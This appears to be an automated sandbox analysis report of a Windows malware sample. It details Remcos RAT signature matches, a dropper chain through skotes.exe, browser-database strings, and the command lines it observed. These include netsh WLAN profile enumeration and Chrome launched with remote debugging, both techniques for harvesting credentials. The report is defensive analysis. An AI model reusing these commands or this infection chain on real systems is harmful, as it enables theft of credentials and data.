Source: 0000000C.00000003.2419805478.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: remcos_a.exe PID: 7184, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: remcos.exe PID: 7280, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: remcos.exe PID: 7640, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: remcos.exe PID: 180, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: file.exe	Static PE information: Section: rswsxqeb ZLIB complexity 0.9947864490575838
Source: random[1].exe.11.dr	Static PE information: Section: rswsxqeb ZLIB complexity 0.9947864490575838
Source: c2a8de8bf3.exe.11.dr	Static PE information: Section: rswsxqeb ZLIB complexity 0.9947864490575838
Source: remcos_a[1].exe.11.dr	Static PE information: Section: ZLIB complexity 0.9965601679104478
Source: remcos_a.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9965601679104478
Source: remcos.exe.12.dr	Static PE information: Section: ZLIB complexity 0.9965601679104478

Source: DocumentsFHIEBKKFHI.exe.0.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: skotes.exe.9.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: buildd[1].exe.11.dr, l_.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: buildd.exe.11.dr, mL.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: buildd.exe.11.dr, mL.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: buildd[1].exe.11.dr, mL.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: buildd[1].exe.11.dr, mL.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: buildd.exe.11.dr, l_.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@62/55@19/14

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C640300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

0_2_6C640300

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\OJX2PK3V.htm

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Mutant created: \Sessions\1\BaseNamedObjects\11ll02lod7
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3896:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
Source: C:\ProgramData\Remcos\remcos.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-A34JIZ

Source: C:\Users\user\DocumentsFHIEBKKFHI.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2012082356.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2004793926.000000001D915000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2012082356.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2004793926.000000001D915000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2012082356.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2004793926.000000001D915000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2012082356.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2004793926.000000001D915000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.2012082356.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2004793926.000000001D915000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2012082356.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2004793926.000000001D915000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2012082356.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2004793926.000000001D915000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1862255290.000000001D814000.00000004.00000020.00020000.00000000.sdmp, buildd.exe, 0000000E.00000002.2501434098.000001DBA8877000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2556240455.0000000005429000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2684063164.0000000005657000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2012082356.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2004793926.000000001D915000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2012082356.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2004793926.000000001D915000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe	ReversingLabs: Detection: 47%
Source: file.exe	Virustotal: Detection: 45%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2156,i,3658342765424133982,5433564740709363588,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsFHIEBKKFHI.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsFHIEBKKFHI.exe "C:\Users\user\DocumentsFHIEBKKFHI.exe"
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe "C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe"
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe "C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe"
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe "C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe"
Source: unknown	Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe "C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe "C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe "C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe "C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe "C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe"
Source: unknown	Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsFHIEBKKFHI.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2156,i,3658342765424133982,5433564740709363588,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsFHIEBKKFHI.exe "C:\Users\user\DocumentsFHIEBKKFHI.exe"	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe "C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe "C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe "C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe "C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe "C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: profapi.dll	Jump to behavior
